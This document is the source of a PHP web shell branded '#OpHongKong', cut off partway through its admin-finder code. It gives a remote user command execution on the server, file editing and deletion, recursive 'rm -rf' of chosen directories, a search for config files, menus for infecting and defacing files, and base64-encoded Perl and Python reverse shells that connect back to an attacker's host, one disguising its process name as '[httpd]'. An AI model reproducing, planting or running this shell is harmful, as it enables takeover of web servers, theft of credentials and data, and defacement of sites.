shell.php

1. <!---
2. # Official shell of #OpHongKong
3. # Shell By - @t3chfl4r3
4. #
5. #
6. #
7. --->
8.  
9. <title>~ #OpHongKong ~</title>
10. <link rel="shortcut icon" type="image/png" href="http://tinyurl.com/nvd8n8g"/>
11.  
12. <?php
13.  
14. @ini_set("memory_limit", "9999M");
15. @ini_set("max_execution_time", "0");
16. @ini_set("upload_max_filesize", "9999m");
17. @ini_set("magic_quotes_gpc", "0");
18. @set_magic_quotes_runtime(0);
19. @set_time_limit(0);
20. error_reporting(0);
21.  
22. //Style Variables
23. $fontcolor = "FF0000";
24. $fontsize = "12px";
25. $fontfamily = "courier";
26. $fontweight = "normal";
27. $tablebordercolor = "#000000";
28. $tablebgcolor = "#000000";
29. $tablehovercolor = "#141414";
30. $textareabgcolor = "#000000";
31. $textareafontcolor = "#FF0000";
32. $textareabordercolor = "#FF0000";
33. $inputbgcolor = "#000000";
34. $inputfontcolor = "#FF0000";
35. $inputbordercolor = "#FF0000";
36. $linkcolor = "#FFFFFF";
37. $activelinkcolor = "#FF0000";
38. $hoverlinkcolor = "#FF0000";
39. $visitedlinkcolor = "#FFFFFF";
40. $contentpadding = "10px";
41. $containerbordercolor = "#FF0000";
42.  
43. //Other Variables
44. $version = "#OpHongKong";
45. $yourip = $_SERVER['REMOTE_ADDR'];
46. $whoami = function_exists("posix_getpwuid") ? posix_getpwuid(posix_geteuid()) : exe_cmd("whoami");
47. $whoami = function_exists("posix_getpwuid") ? $whoami['name'] : exe_cmd("whoami");
48. $uname = php_uname();
49. $serversoftware = $_SERVER['SERVER_SOFTWARE'];
50. $gatewayinterface = $_SERVER['GATEWAY_INTERFACE'];
51. $servername = $_SERVER['SERVER_NAME'];
52. $serverip = $_SERVER['SERVER_ADDR'];
53. $safemode = ini_get('safe_mode') ? "Enabled" : "Disabled";
54. $openbasedir = ini_get('open_basedir') ? "Enabled" : "Disabled";
55. $disabledfunc = ini_get('disable_functions');
56. $phpversion = phpversion();
57. $domain = $_SERVER['HTTP_HOST'];
58. $rootdir = CleanDir($_SERVER['DOCUMENT_ROOT']);
59. $syscoms = array('system', 'shell_exec', 'proc_open', 'passthru', 'exec');
60. $compression = array('zip', 'tar', 'tar.gz', 'tgz', 'gz', 'rar');
61.  
62. $bcpl = "IyEvdXNyL2Jpbi9wZXJsIC13DQojIHBlcmwtcmV2ZXJzZS1zaGVsbCAtIEEgUmV2ZXJzZSBTaGVsbCBpbXBsZW1lbnRhdGlvbiBpbiBQRVJMDQojIENvcHlyaWdodCAoQykgMjAwNiBwZW50ZXN0bW9ua2V5QHBlbnRlc3Rtb25rZXkubmV0DQojDQojIEFkZGVkIGNvbW1hbmQgbGluZSBhcmd1bWVudHMgZm9yIGVhc3kgZXhlY3V0aW9uIH4gUGx1bQ0KIyBTb3JyeSBhYm91dCByZW1vdmluZyB0aGUgcmVzdCBvZiB0aGUgY29tbWVudHMuIA0KIyBUcnlpbmcgdG8gc2F2ZSBhcyBtdWNoIHNwYWNlIGFzIHBvc3NpYmxlIGFzIHRoaXMgd2lsbCBiZSBiYXNlNjQnZA0KDQp1c2Ugc3RyaWN0Ow0KdXNlIFNvY2tldDsNCnVzZSBGaWxlSGFuZGxlOw0KdXNlIFBPU0lYOw0KbXkgJFZFUlNJT04gPSAiMS4wIjsNCm15ICRBUkdDPUBBUkdWOw0KDQojQ2hlY2sgaWYgYXJndW1lbnRzIGV4aXN0DQppZiAoJEFSR0MhPTIpIHsgDQogICBwcmludCAiVXNhZ2U6ICQwIFtIb3N0XSBbUG9ydF0gXG5cbiI7IA0KICAgZGllICJFeDogJDAgMTI3LjAuMC4xIDIxMjEgXG4iOyANCn0gDQoNCiMgV2hlcmUgdG8gc2VuZCB0aGUgcmV2ZXJzZSBzaGVsbC4gIENoYW5nZSB0aGVzZS4NCm15ICRpcCA9ICRBUkdWWzBdOw0KbXkgJHBvcnQgPSAkQVJHVlsxXTsNCg0KIyBPcHRpb25zDQpteSAkZGFlbW9uID0gMTsNCm15ICRhdXRoICAgPSAwOyAjIDAgbWVhbnMgYXV0aGVudGljYXRpb24gaXMgZGlzYWJsZWQgYW5kIGFueSANCgkJIyBzb3VyY2UgSVAgY2FuIGFjY2VzcyB0aGUgcmV2ZXJzZSBzaGVsbA0KbXkgJGF1dGhvcmlzZWRfY2xpZW50X3BhdHRlcm4gPSBxciheMTI3XC4wXC4wXC4xJCk7DQoNCiMgRGVjbGFyYXRpb25zDQpteSAkZ2xvYmFsX3BhZ2UgPSAiIjsNCm15ICRmYWtlX3Byb2Nlc3NfbmFtZSA9ICIvdXNyL3NiaW4vYXBhY2hlIjsNCg0KIyBDaGFuZ2UgdGhlIHByb2Nlc3MgbmFtZSB0byBiZSBsZXNzIGNvbnNwaWNpb3VzDQokMCA9ICJbaHR0cGRdIjsNCg0KIyBBdXRoZW50aWNhdGUgYmFzZWQgb24gc291cmNlIElQIGFkZHJlc3MgaWYgcmVxdWlyZWQNCmlmIChkZWZpbmVkKCRFTlZ7J1JFTU9URV9BRERSJ30pKSB7DQoJY2dpcHJpbnQoIkJyb3dzZXIgSVAgYWRkcmVzcyBhcHBlYXJzIHRvIGJlOiAkRU5WeydSRU1PVEVfQUREUid9Iik7DQoNCglpZiAoJGF1dGgpIHsNCgkJdW5sZXNzICgkRU5WeydSRU1PVEVfQUREUid9ID1+ICRhdXRob3Jpc2VkX2NsaWVudF9wYXR0ZXJuKSB7DQoJCQljZ2lwcmludCgiRVJST1I6IFlvdXIgY2xpZW50IGlzbid0IGF1dGhvcmlzZWQgdG8gdmlldyB0aGlzIHBhZ2UiKTsNCgkJCWNnaWV4aXQoKTsNCgkJfQ0KCX0NCn0gZWxzaWYgKCRhdXRoKSB7DQoJY2dpcHJpbnQoIkVSUk9SOiBBdXRoZW50aWNhdGlvbiBpcyBlbmFibGVkLCBidXQgSSBjb3VsZG4ndCBkZXRlcm1pbmUgeW91ciBJUCBhZGRyZXNzLiAgRGVueWluZyBhY2Nlc3MiKTsNCgljZ2lleGl0KDApOw0KfQ0KDQojIEJhY2tncm91bmQgYW5kIGRpc3NvY2lhdGUgZnJvbSBwYXJlbnQgcHJvY2VzcyBpZiByZXF1aXJlZA0KaWYgKCRkYWVtb24pIHsNCglteSAkcGlkID0gZm9yaygpOw0KCWlmICgkcGlkKSB7DQoJCWNnaWV4aXQoMCk7ICMgcGFyZW50IGV4aXRzDQoJfQ0KDQoJc2V0c2lkKCk7DQoJY2hkaXIoJy8nKTsNCgl1bWFzaygwKTsNCn0NCg0KIyBNYWtlIFRDUCBjb25uZWN0aW9uIGZvciByZXZlcnNlIHNoZWxsDQpzb2NrZXQoU09DSywgUEZfSU5FVCwgU09DS19TVFJFQU0sIGdldHByb3RvYnluYW1lKCd0Y3AnKSk7DQppZiAoY29ubmVjdChTT0NLLCBzb2NrYWRkcl9pbigkcG9ydCxpbmV0X2F0b24oJGlwKSkpKSB7DQoJY2dpcHJpbnQoIlNlbnQgcmV2ZXJzZSBzaGVsbCB0byAkaXA6JHBvcnQiKTsNCgljZ2lwcmludHBhZ2UoKTsNCn0gZWxzZSB7DQoJY2dpcHJpbnQoIkNvdWxkbid0IG9wZW4gcmV2ZXJzZSBzaGVsbCB0byAkaXA6JHBvcnQ6ICQhIik7DQoJY2dpZXhpdCgpOwkNCn0NCg0KIyBSZWRpcmVjdCBTVERJTiwgU1RET1VUIGFuZCBTVERFUlIgdG8gdGhlIFRDUCBjb25uZWN0aW9uDQpvcGVuKFNURElOLCAiPiZTT0NLIik7DQpvcGVuKFNURE9VVCwiPiZTT0NLIik7DQpvcGVuKFNUREVSUiwiPiZTT0NLIik7DQokRU5WeydISVNURklMRSd9ID0gJy9kZXYvbnVsbCc7DQpzeXN0ZW0oInc7dW5hbWUgLWE7aWQ7cHdkIik7DQpleGVjKHsiL2Jpbi9zaCJ9ICgkZmFrZV9wcm9jZXNzX25hbWUsICItaSIpKTsNCg0KIyBXcmFwcGVyIGFyb3VuZCBwcmludA0Kc3ViIGNnaXByaW50IHsNCglteSAkbGluZSA9IHNoaWZ0Ow0KCSRsaW5lIC49ICI8cD5cbiI7DQoJJGdsb2JhbF9wYWdlIC49ICRsaW5lOw0KfQ0KDQojIFdyYXBwZXIgYXJvdW5kIGV4aXQNCnN1YiBjZ2lleGl0IHsNCgljZ2lwcmludHBhZ2UoKTsNCglleGl0IDA7ICMgMCB0byBlbnN1cmUgd2UgZG9uJ3QgZ2l2ZSBhIDUwMCByZXNwb25zZS4NCn0NCg0KIyBGb3JtIEhUVFAgcmVzcG9uc2UgdXNpbmcgYWxsIHRoZSBtZXNzYWdlcyBnYXRoZXJlZCBieSBjZ2lwcmludCBzbyBmYXINCnN1YiBjZ2lwcmludHBhZ2Ugew0KCXByaW50ICJDb250ZW50LUxlbmd0aDogIiAuIGxlbmd0aCgkZ2xvYmFsX3BhZ2UpIC4gIlxyDQpDb25uZWN0aW9uOiBjbG9zZVxyDQpDb250ZW50LVR5cGU6IHRleHRcL2h0bWxcclxuXHJcbiIgLiAkZ2xvYmFsX3BhZ2U7DQp9";
63. $bcpy = "IyEgL3Vzci9iaW4vZW52IHB5dGhvbg0KDQojIENvcHlyaWdodCAoYykgMjAxMSBYYXZpZXIgR2FyY2lhIHd3dy5zaGVsbGd1YXJkaWFucy5jb20NCiMgQWxsIHJpZ2h0cyByZXNlcnZlZC4NCiMNCiMgIEJhc2VkIG9uIHRoZSBQeXRob24gY29ubmVjdCBiYWNrIHNoZWxsIHdyaXR0ZW4gYnkgRGF2aWQgS2VubmVkeQ0KIyAgaHR0cDovL3d3dy5zZWNtYW5pYWMuY29tL2p1bmUtMjAxMS9jcmVhdGluZy1hLTEzLWxpbmUtYmFja2Rvb3Itd29ycnktZnJlZS1vZi1hdi8NCiMNCiMgQWRkZWQgY29tbWFuZCBsaW5lIGFyZ3VtZW50cyBmb3IgZWFzeSBleGVjdXRpb24NCiMgU29ycnkgYWJvdXQgcmVtb3ZpbmcgdGhlIHJlc3Qgb2YgdGhlIGNvbW1lbnRzDQojIFRyeWluZyB0byBzYXZlIHNwYWNlIGFzIHRoaXMgd2lsbCBiZSBiYXNlNjQnZA0KDQppbXBvcnQgc29ja2V0DQppbXBvcnQgc3VicHJvY2Vzcw0KaW1wb3J0IHN5cw0KaW1wb3J0IHRpbWUNCg0KaWYgbGVuKHN5cy5hcmd2KSA8IDM6DQoJcHJpbnQoJ1VzYWdlOiBweXRob24gJytzeXMuYXJndlswXSsnIDxJUD4gPFBPUlQ+JykNCglwcmludCgnRXhhbXBsZTogcHl0aG9uICcrc3lzLmFyZ3ZbMF0rJyAxMjcuMC4wLjEgMjEyMScpDQoJc3lzLmV4aXQoKQ0KDQpIT1NUID0gc3lzLmFyZ3ZbMV0gICAgIyBUaGUgcmVtb3RlIGhvc3QNClBPUlQgPSBpbnQoc3lzLmFyZ3ZbMl0pICAgIyBUaGUgc2FtZSBwb3J0IGFzIHVzZWQgYnkgdGhlIHNlcnZlcg0KDQpkZWYgY29ubmVjdCgoaG9zdCwgcG9ydCkpOg0KCXMgPSBzb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULCBzb2NrZXQuU09DS19TVFJFQU0pDQoJcy5jb25uZWN0KChob3N0LCBwb3J0KSkNCglyZXR1cm4gcw0KDQpkZWYgd2FpdF9mb3JfY29tbWFuZChzKToNCglkYXRhID0gcy5yZWN2KDEwMjQpDQoJaWYgZGF0YSA9PSAiZXhpdFxuIjoNCgkJcy5jbG9zZSgpDQoJCXN5cy5leGl0KDApDQoJIyB0aGUgc29ja2V0IGRpZWQNCgllbGlmIGxlbihkYXRhKT09MDoNCgkJcmV0dXJuIFRydWUNCgllbHNlOg0KCQkjIGRvIHNoZWxsIGNvbW1hbmQNCgkJcHJvYyA9IHN1YnByb2Nlc3MuUG9wZW4oZGF0YSwgc2hlbGw9VHJ1ZSwNCgkJCXN0ZG91dD1zdWJwcm9jZXNzLlBJUEUsIHN0ZGVycj1zdWJwcm9jZXNzLlBJUEUsDQoJCQlzdGRpbj1zdWJwcm9jZXNzLlBJUEUpDQoJCSMgcmVhZCBvdXRwdXQNCgkJc3Rkb3V0X3ZhbHVlID0gcHJvYy5zdGRvdXQucmVhZCgpICsgcHJvYy5zdGRlcnIucmVhZCgpDQoJCSMgc2VuZCBvdXRwdXQgdG8gYXR0YWNrZXINCgkJcy5zZW5kKHN0ZG91dF92YWx1ZSkNCgkJcmV0dXJuIEZhbHNlDQoNCmRlZiBtYWluKCk6DQoJd2hpbGUgVHJ1ZToNCgkJc29ja2VkX2RpZWQ9RmFsc2UNCgkJdHJ5Og0KCQkJcz1jb25uZWN0KChIT1NULFBPUlQpKQ0KCQkJd2hpbGUgbm90IHNvY2tlZF9kaWVkOg0KCQkJCXNvY2tlZF9kaWVkPXdhaXRfZm9yX2NvbW1hbmQocykNCgkJCXMuY2xvc2UoKQ0KCQlleGNlcHQgc29ja2V0LmVycm9yOg0KCQkJcGFzcw0KCQl0aW1lLnNsZWVwKDUpDQoNCmlmIF9fbmFtZV9fID09ICJfX21haW5fXyI6DQoJc3lzLmV4aXQobWFpbigpKQ==";
64.  
65. //Tab Options Layout
66. $currentfile = basename(__FILE__);
67. $tabs = array(
68. "System"=> array(
69. "CPU" => "./".$currentfile."?cpu",
70. "Users" => "./".$currentfile."?users",
71. "Memory" => "./".$currentfile."?memory",
72. "Processes" => "./".$currentfile."?processes"
73. ),
74. "Mass Editor" => array(
75. "Infect Files" => "./".$currentfile."?fileInfect",
76. "Deface Files" => "./".$currentfile."?fileDeface"
77. ),
78. "Back Connect" => array(
79. "PHP" => "./".$currentfile."?bcPHP",
80. "Perl" => "./".$currentfile."?bcPerl",
81. "Python" => "./".$currentfile."?bcPython"
82. ),
83. "Shell" => array(
84. "Kill" => "./".$currentfile."?kill",
85. "Credits" => "./".$currentfile."?credits",
86. "Check Links" => "./".$currentfile."?checkLinks"
87. ),
88. "Extras" => array(
89. "Reverse IP" => "./".$currentfile."?reverseIP",
90. "Hash Generator" => "./".$currentfile."?hashGenerator"
91. ),
92. "Search" => array(
93. "Admin Finder" => "./".$currentfile."?adminFinder",
94. "Config Finder" => "./".$currentfile."?configFinder",
95. "Search Files/Dir" => "./".$currentfile."?search"
96. )
97. );
98.  
99. $links = array(
100. "BOOTSTRAPCSS" => array(
101. "LINK" => "http://dl.dropboxusercontent.com/s/mzs89eukbo0apxz/bootstrap_navbar.css",
102. "MD5" => "5ed756c76e52bcf521040ff09a01f3f3",
103. "DESC" => "Bootstrap Nav Bar CSS"
104. ),
105. "BOOTSTRAPJS" => array(
106. "LINK" => "http://dl.dropboxusercontent.com/s/ogxuaa6ccn0itgd/bootstrap-dropdown.js",
107. "MD5" => "be4478613ae8c0bb1b799e6b340519e4",
108. "DESC" => "Bootstrap Dropdown JS"
109. ),
110. "BACKGROUND" => array(
111. "LINK" => "https://pbs.twimg.com/profile_images/1773564270/anonymous-logo-1.jpg",
112. "MD5" => "bb87b9287906b2cde47fd18680e4f00d",
113. "DESC" => "Background Image"
114. )
115. );
116.  
117. if(!@$_GET['dir']) {
118. $dir = CleanDir(getcwd());
119. } else {
120. $dir = CleanDir($_GET['dir']);
121. }
122.  
123. function CleanDir($directory) {
124. $directory = str_replace("\\", "/", $directory);
125. $directory = str_replace("//", "/", $directory);
126. return $directory;
127. }
128.  
129. function ByteConversion($bytes, $precision = 2) {
130. $kilobyte = 1024;
131. $megabyte = $kilobyte * 1024;
132. $gigabyte = $megabyte * 1024;
133. $terabyte = $gigabyte * 1024;
134.  
135. if (($bytes >= 0) && ($bytes < $kilobyte)) {
136. return $bytes . ' B';
137. } elseif (($bytes >= $kilobyte) && ($bytes < $megabyte)) {
138. return round($bytes / $kilobyte, $precision) . ' KB';
139. } elseif (($bytes >= $megabyte) && ($bytes < $gigabyte)) {
140. return round($bytes / $megabyte, $precision) . ' MB';
141. } elseif (($bytes >= $gigabyte) && ($bytes < $terabyte)) {
142. return round($bytes / $gigabyte, $precision) . ' GB';
143. } elseif ($bytes >= $terabyte) {
144. return round($bytes / $terabyte, $precision) . ' TB';
145. } else {
146. return $bytes . ' B';
147. }
148. }
149.  
150. function success($message) {
151. echo "<center><font color='green' size='5'><b>$message</b></font></center>";
152. }
153.  
154. function error($message) {
155. echo "<center><font color='red' size='5'><b>$message</b></font></center>";
156. }
157.  
158. function redirect($url) {
159. echo "<script>window.location = '$url';</script>";
160. }
161.  
162. function mass_files($mass_dir, $justdirs) {
163. if($dh = opendir($mass_dir)) {
164. $files = array();
165. $inner_files = array();
166. while($file = readdir($dh)) {
167. if($file != "." && $file != ".." && $file[0] != '.') {
168. if(is_dir($mass_dir . "/" . $file)) {
169. $inner_files = mass_files("$mass_dir/$file", $justdirs);
170. if(is_array($inner_files)) $files = array_merge($files, $inner_files);
171. if($justdirs) { array_push($files, "$mass_dir/$file"); }
172. } else {
173. if(!$justdirs) { array_push($files, "$mass_dir/$file"); }
174. }
175. }
176. }
177. closedir($dh);
178. return $files;
179. }
180. }
181.  
182. function can_exe() {
183. global $disabledfunc;
184. global $syscoms;
185. $disabledfunc = explode(",", str_replace(' ', '', $disabledfunc));
186. if(count(array_intersect($syscoms, $disabledfunc)) == count($syscoms)) {
187. return false;
188. } else {
189. return true;
190. }
191. }
192.  
193. function exe_cmd($command) {
194. global $dir;
195. chdir($dir);
196. if(function_exists('proc_open')) {
197. $execute = proc_open($command, array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io);
198. $result = "";
199. while (!feof($io[1])) {
200. $result .= htmlspecialchars(fgets($io[1]), ENT_COMPAT, 'UTF-8');
201. }
202. while (!feof($io[2])) {
203. $result .= htmlspecialchars(fgets($io[2]), ENT_COMPAT, 'UTF-8');
204. }
205. fclose($io[1]);
206. fclose($io[2]);
207. proc_close($execute);
208. return $result;
209. } elseif(function_exists('system')) {
210. $result = system($command);
211. return $result;
212. } elseif(function_exists('exec')) {
213. $result = exec($command);
214. return $result;
215. } elseif(functions_exists('shell_exec')) {
216. $result = shell_exec($command);
217. return $result;
218. } elseif(function_exists('passthru')) {
219. $result = passthru($command);
220. return $result;
221. }
222. }
223.  
224. function salt_gen($length) {
225. $characters = array("a","A","b","B","c","C","d","D","e","E","f","F","g","G","h","H","i","I","j","J","k","K","l","L","m","M","n","N","o","O","p","P","q","Q","r","R","s","S","t","T","u","U","v","V","w","W","x","X","y","Y","z","Z","1","2","3","4","5","6","7","8","9");
226. $i = 0;
227. $salt = "";
228. while($i < $length) {
229. $arrand = array_rand($characters, 1);
230. $salt .= $characters[$arrand];
231. $i++;
232. }
233. return $salt;
234. }
235.  
236. function extract_file($filepath, $extractpath, $type) {
237. if($type == 'zip') {
238. if(class_exists('ZipArchive')) {
239. $newzip = new ZipArchive;
240. $open = $newzip->open($filepath);
241. if($open == true) {
242. $newzip->extractTo($extractpath);
243. $newzip->close();
244. redirect("?dir=$extractpath");
245. } else {
246. error('Failed to open zip archive!');
247. }
248. } else {
249. if(can_exe()) {
250. error('ZipArchive class does not exist!<br>Trying to extract via sys commands');
251. echo "<center>
252. The response from 'unzip $filepath -d $extractpath' was:<br>
253. <textarea rows='10' cols='85' readonly>".exe_cmd("unzip $filepath -d $extractpath")."</textarea>
254. </center>";
255. } else {
256. error('Zip archive does not exist and commands can not be executed!');
257. }
258. }
259. } elseif($type == 'tar') {
260. if(class_exists('PharData')) {
261. $newphar = new PharData($filepath);
262. $newphar->extractTo($extractpath);
263. unlink($filepath);
264. redirect("?dir=$extractpath");
265. } else {
266. if(can_exe()) {
267. error('PharData class does not exist!<br>Trying to extract via sys commands');
268. echo "<center>
269. The response from 'tar xvf $filepath -C $extractpath' was:<br>
270. <textarea rows='10' cols='85' readonly>".exe_cmd("tar xvf $filepath -C $extractpath")."</textarea>
271. </center>";
272. } else {
273. error('PharData class does not exist and commands can not be executed!');
274. }
275. }
276. } elseif($type == 'gz') {
277. if(function_exists('gzopen')) {
278. $decomname = $extractpath."/".str_replace(".gz", "", pathinfo($filepath, PATHINFO_BASENAME));
279. $open = gzopen($filepath, "rb");
280.  
281. while($contents = gzread($open, 4096)) {
282. file_put_contents($decomname, $contents, FILE_APPEND);
283. }
284. gzclose($open);
285. redirect("?dir=$extractpath");
286. } else {
287. if(can_exe()) {
288. $decomname = $extractpath."/".str_replace(".gz", "", pathinfo($filepath, PATHINFO_BASENAME));
289. error('Zlib does not seem to be enabled!<br>Trying to extract via sys commands.');
290. echo "<center>
291. The response from 'gunzip -c $filepath > $decomname' was:<br>
292. <textarea rows='10' cols='85' readonly>".exe_cmd("gunzip -c $filepath > $decomname")."</textarea>
293. </center>";
294. } else {
295. error('Zlib does not seem to be enabled and commands can not be executed!');
296. }
297. }
298. } elseif($type == 'tgz') {
299. if(class_exists('PharData')) {
300. $newphar = new PharData($filepath);
301. $newphar->decompress();
302.  
303. $newphar = new PharData(str_replace(".tgz", ".tar", $filepath));
304. $newphar->extractTo($extractpath);
305. unlink($filepath);
306. unlink(str_replace(".tgz", ".tar", $filepath));
307. redirect("?dir=$extractpath");
308. } else {
309. if(can_exe()) {
310. error('PharData class does not exist!<br>Trying to extract via sys commands.');
311. echo "<center>
312. The response from 'tar xvfz $filepath -C $extractpath && rm $filepath' was:<br>
313. <textarea rows='10' cols='85' readonly>".exe_cmd("tar xvfz $filepath -C $extractpath && rm $filepath")."</textarea>
314. </center>";
315. } else {
316. error('PharData class does not exist and commands can not be executed!');
317. }
318. }
319. } elseif($type == 'rar') {
320. if(class_exists('RarArchive')) {
321. $openrar = RarArchive::open($filepath);
322.  
323. if($raropen == true) {
324. $entries = $openrar->getEntries();
325. foreach($entries as $files) {
326. $files->extract($extractpath);
327. }
328. $openrar->close();
329. } else {
330. error('Failed to open rar file!');
331. $openrar->close();
332. }
333. } else {
334. if(can_exe()) {
335. error('RarArchive class does not exist!<br>Trying to extract via sys commands.');
336. echo "<center>
337. The response from 'unrar x $filepath $extractpath' was:<br>
338. <textarea rows='10' cols='85' readonly>".exe_cmd("unrar x $filepath $extractpath")."</textarea>
339. </center>";
340. } else {
341. error('RarArchive class does not exist and commands can not be executed!');
342. }
343. }
344. }
345. }
346.  
347. //Initialize StyleSheet
348. echo "
349. <link rel='stylesheet' href='".$links['BOOTSTRAPCSS']['LINK']."'>
350. <script src='//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js'></script>
351. <script src='".$links['BOOTSTRAPJS']['LINK']."'></script>
352. <style>
353. body {
354. background: #141414 url('".$links['BACKGROUND']['LINK']."');
355. color: $fontcolor;
356. padding-top: 100px !important;
357. margin:0;
358. font-family:$fontfamily;
359. font-size:$fontsize;
360. font-weight:$fontweight;
361. background-size: 50%;
362. }
363. #container {
364. width: 500px;
365. border-color: $containerboredercolor;
366. margin-left: auto;
367. margin-right: auto;
368. }
369. #content {
370. background-color: black;
371. border: 1px solid #000000;
372. padding: $contentpadding;
373. }
374. #container1 {
375. width: 250px;
376. border-color: $containerboredercolor;
377. margin-left: auto;
378. margin-right: auto;
379. }
380. #content1 {
381. background-color: black;
382. border-color: #FF0000;
383. border: 1px solid #000000;
384. padding: 5px;
385. }
386. table{
387. border-color: $tablebordercolor;
388. background-color: $tablebgcolor;
389. opacity: 0.9;
390. }
391. #hover tr:hover{
392. background-color: $tablehovercolor;
393. }
394. textarea {
395. background-color: $textareabgcolor;
396. resize:none;
397. color: $textareafontcolor;
398. border-color: $textareabordercolor;
399. outline: none;
400. }
401. input {
402. background-color: $inputbgcolor;
403. resize:none;
404. color: $inputfontcolor;
405. border-color: $inputbordercolor;
406. outline: none;
407. }
408. a:link {color: $linkcolor; text-decoration: none; }
409. a:active {color: $activelinkcolor; text-decoration: none; }
410. a:visited {color: $visitedlinkcolor; text-decoration: none; }
411. a:hover {color: $hoverlinkcolor; text-decoration: none; }
412. </style>";
413.  
414. //Let's display nav bar
415. echo <<<html
416. <script>
417. $(window).load(function(){
418. $('#topbar').dropdown();
419. });
420. </script>
421. <div class="topbar" id="topbar">
422. <div class="fill">
423. <div class="container">
424. <a class="brand" href="./$currentfile">Home</a>
425. <ul class="nav">
426. html;
427. foreach($tabs as $title => $link) {
428. if(is_array($link)) {
429. echo '<li class="menu">
430. <a href="#" class="menu">'.$title.'</a>
431. <ul class="menu-dropdown">';
432. foreach($link as $dtitle => $dlink) {
433. echo "<li><a href='$dlink'>$dtitle</a></li>";
434. }
435. echo "</ul>";
436. } else {
437. echo "<li><a href='$link'>$title</a></li>";
438. }
439. }
440. echo <<<html
441. </ul>
442. </div>
443. </div>
444. </div>
445. html;
446.  
447. //#OpHongKong Banner
448. echo "<center>
449. <span><font color='#FF0000' size='35'><b>Official #OpHongKong Shell</b></font></span>
450. <br>
451. <br>
452. <br>
453. <center>";
454.  
455. //Let's display system bar
456. if(empty($disabledfunc)) {
457. $disabledfun = "None";
458. } else {
459. $count = count(explode(",", $disabledfunc));
460. $disabledfun = "<a href='?disabledFunctions'>$count functions disabled</a>";
461. }
462. echo <<<html
463. <table width="75%" border="1">
464. <tr>
465. <th>Your IP</th>
466. <th>User</th>
467. <th>System</th>
468. <th>Server Software</th>
469. <th>Gateway Interface</th>
470. <th>PHP Version</th>
471. <th>Server Name</th>
472. <th>Server IP</th>
473. <th>safe_mode</th>
474. <th>open_basedir</th>
475. <th>Disabled Functions</th>
476. </tr>
477. <tr>
478. <td>$yourip</td>
479. <td>$whoami</td>
480. <td>$uname</td>
481. <td>$serversoftware</td>
482. <td>$gatewayinterface</td>
483. <td>$phpversion</td>
484. <td>$servername</td>
485. <td>$serverip</td>
486. <td>$safemode</td>
487. <td>$openbasedir</td>
488. <td>$disabledfun</td>
489. </tr>
490. </table><br><br>
491. html;
492.  
493. //Read & Edit File
494. if(isset($_POST['save_file'])) {
495. $file = $_GET['edit'];
496. $newcontent = $_POST['edit_file'];
497. if(get_magic_quotes_gpc()) {
498. $newcontent = stripslashes($newcontent);
499. }
500. if(file_put_contents($file, $newcontent)) {
501. success("File has been saved successfully!");
502. } else {
503. error("File was not saved successfully!");
504. }
505. }
506. if(isset($_POST['delete_file'])) {
507. $file = $_GET['edit'];
508. if(unlink($file)) {
509. success("File was successfully deleted!");
510. } else {
511. error("File could not be deleted successfully!");
512. }
513. }
514.  
515. if(isset($_GET['delF'])) {
516. $file = $_GET['delF'];
517. if(unlink($file)) {
518. success("File was successfully deleted!");
519. } else {
520. error("File could not be deleted successfully!");
521. }
522. }
523.  
524. if(isset($_GET['delD'])) {
525. $ddir = $_GET['delD'];
526. if(can_exe()) {
527. echo "<center>
528. The response from 'rm -rf $ddir' was:<br>
529. <textarea cols='120' rows='20'>".exe_cmd("rm -rf $ddir")."</textarea>
530. </center>";
531. } else {
532. if(rmdir($ddir)) {
533. success("Directory successfully deleted!");
534. } else {
535. error("Failed to delete directory!");
536. }
537. }
538. }
539.  
540. if(isset($_GET['edit'])) {
541. $file = $_GET['edit'];
542. if(file_exists($file)) {
543. $content = htmlspecialchars(file_get_contents($file));
544. if(!is_writeable($file)) {
545. echo "<center>
546. <font color='red' size=5>This file is read only!</font><br>
547. <textarea cols='120' rows='25' name='edit_file' readonly >$content</textarea>
548. </center>";
549. } else {
550. echo "<center>
551. <form action='' method='post'>
552. <textarea cols='120' rows='25' name='edit_file'>$content</textarea><br>
553. <input type='submit' name='save_file' value='Save'>
554. <input type='submit' name='delete_file' value='Delete'>
555. </form>
556. </center>";
557. }
558. } else {
559. error("File does not exist!");
560. }
561. }
562.  
563. //Rename File
564. if(isset($_POST['rename'])) {
565. $newname = $_POST['new_name'];
566. $oldname = $_GET['rename'];
567. $rdir = $_GET['rdir'];
568. if(rename("$rdir/$oldname", "$rdir/$newname")) {
569. success("File was successfully renamed to: $newname");
570. } else {
571. error("File was not renamed!");
572. }
573. }
574.  
575. if(isset($_GET['rename'])) {
576. $oldname = $_GET['rename'];
577. echo "<center>
578. <form action='' method='post'>
579. Rename: <input type='text' name='new_name' value='$oldname'>
580. <input type='submit' name='rename' value='rename'>
581. </form>
582. </center>";
583. }
584.  
585. //Search Files and Directories
586. if(isset($_GET['search'])) {
587. echo "<center>
588. <form action='' method='post'>
589. Search for value in file and directory names.<br>
590. Directory to search in: <input type='text' name='search_dir' value='$dir'><br>
591. Value to search for: <input type='text' name='search_val'><br>
592. <input type='submit' name='search' value='Search'>
593. </form>
594. </center>";
595. }
596. if(isset($_POST['search'])) {
597. $searchdir = $_POST['search_dir'];
598. $searchval = $_POST['search_val'];
599. echo "Search results that contain '$searchval' in file names.<br>";
600. foreach(mass_files($searchdir, false) as $key => $filename) {
601. $basename = pathinfo($filename, PATHINFO_BASENAME);
602. if(preg_match('/'.$searchval.'/', $basename)) {
603. echo "<a href='?edit=$filename'>$filename</a><br>";
604. }
605. }
606. echo "<br>Search results that contain '$searchval' in directory names.<br>";
607. foreach(mass_files($searchdir, true) as $key => $dirname) {
608. $basename = pathinfo($dirname, PATHINFO_BASENAME);
609. if(preg_match('/'.$searchval.'/', $basename)) {
610. echo "<a href='?dir=$dirname'>$dirname</a><br>";
611. }
612. }
613. }
614.  
615. //Config Finder
616. if(isset($_GET['configFinder'])) {
617. echo "Search results that contain 'config' in file names.<br>";
618. foreach(mass_files($rootdir, false) as $key => $filename) {
619. $basename = pathinfo($filename, PATHINFO_BASENAME);
620. if(preg_match('/config/', $basename)) {
621. echo "<a href='?edit=$filename'>$filename</a><br>";
622. }
623. }
624. echo "<br>Search results that contain 'config' in directory names.<br>";
625. foreach(mass_files($rootdir, true) as $key => $filename) {
626. $basename = pathinfo($filename, PATHINFO_BASENAME);
627. if(preg_match('/config/', $basename)) {
628. echo "<a href='?edit=$filename'>$filename</a><br>";
629. }
630. }
631. }
632.  
633. //Admin Finder
634. if(isset($_GET['adminFinder'])) {
